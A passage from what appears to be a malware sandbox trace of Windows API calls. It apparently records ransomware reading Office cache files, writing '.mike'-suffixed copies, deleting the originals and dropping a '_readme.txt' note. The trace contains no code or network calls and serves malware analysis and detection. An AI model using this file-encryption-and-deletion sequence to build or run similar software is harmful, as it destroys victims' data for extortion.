users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x212d05c | out: lpFileInformation=0x212d05c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f356eb0, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f356eb0, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1861)) returned 1 [0040.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.566] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.566] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.566] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.566] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.566] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.567] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.567] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0040.567] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0040.567] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.567] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.601] GetFileType (hFile=0x264) returned 0x1 [0040.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.601] GetFileType (hFile=0x264) returned 0x1 [0040.601] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0040.601] WriteFile (in: hFile=0x264, lpBuffer=0x212ded8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x212ded8*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0040.602] CloseHandle (hObject=0x264) returned 1 [0040.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0040.602] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x212d9e0 | out: lpFileInformation=0x212d9e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f356eb0, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f356eb0, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1861)) returned 1 [0040.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0040.602] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0040.602] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.602] GetFileType (hFile=0x264) returned 0x1 [0040.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0040.602] GetFileType (hFile=0x264) returned 0x1 [0040.602] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0040.603] ReadFile (in: hFile=0x264, lpBuffer=0x212f000, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x212f000*, lpNumberOfBytesRead=0x2af110*=0x1861, lpOverlapped=0x0) returned 1 [0040.618] CloseHandle (hObject=0x264) returned 1 [0040.619] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.619] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.619] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.619] GetFileType (hFile=0x264) returned 0x1 [0040.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.619] GetFileType (hFile=0x264) returned 0x1 [0040.619] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0040.619] WriteFile (in: hFile=0x264, lpBuffer=0x2139784*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2139784*, lpNumberOfBytesWritten=0x2af124*=0x1870, lpOverlapped=0x0) returned 1 [0040.619] CloseHandle (hObject=0x264) returned 1 [0040.620] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0040.620] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.620] GetFileType (hFile=0x264) returned 0x1 [0040.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0040.620] GetFileType (hFile=0x264) returned 0x1 [0040.621] WriteFile (in: hFile=0x264, lpBuffer=0x213d34c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x213d34c*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0040.621] CloseHandle (hObject=0x264) returned 1 [0040.622] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.622] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.622] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.622] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2629700, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2629700, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe269bb20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x1a90)) returned 1 [0040.622] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.622] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.623] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.623] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x213eac8 | out: lpFileInformation=0x213eac8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2629700, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2629700, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe269bb20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x1a90)) returned 1 [0040.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.623] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.623] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0040.623] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.623] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0040.624] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.624] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.624] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.624] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.624] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.624] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0040.624] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0040.625] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0040.625] GetFileType (hFile=0x264) returned 0x1 [0040.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0040.625] GetFileType (hFile=0x264) returned 0x1 [0040.625] WriteFile (in: hFile=0x264, lpBuffer=0x21407ac*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x21407ac*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0040.626] CloseHandle (hObject=0x264) returned 1 [0040.626] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpFilePart=0x0) returned 0x4a [0040.626] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi", lpFilePart=0x0) returned 0x4b [0040.626] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0040.626] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0040.626] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0040.626] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0040.626] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.627] GetFileType (hFile=0x264) returned 0x1 [0040.627] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0040.627] GetFileType (hFile=0x264) returned 0x1 [0040.627] CloseHandle (hObject=0x264) returned 1 [0040.627] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0040.627] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0040.627] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0040.627] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0040.627] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0040.627] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.627] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.627] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2146ae8 | out: lpFileInformation=0x2146ae8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f)) returned 1 [0040.627] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.627] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0040.627] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.627] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2146e14 | out: lpFileInformation=0x2146e14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f)) returned 1 [0040.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.628] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0040.628] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.mike", lpFilePart=0x0) returned 0x50 [0040.628] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.628] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.628] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0040.628] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0040.628] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0040.628] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.mike", lpFilePart=0x0) returned 0x50 [0040.628] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0040.628] GetFileAttributesExW (in: 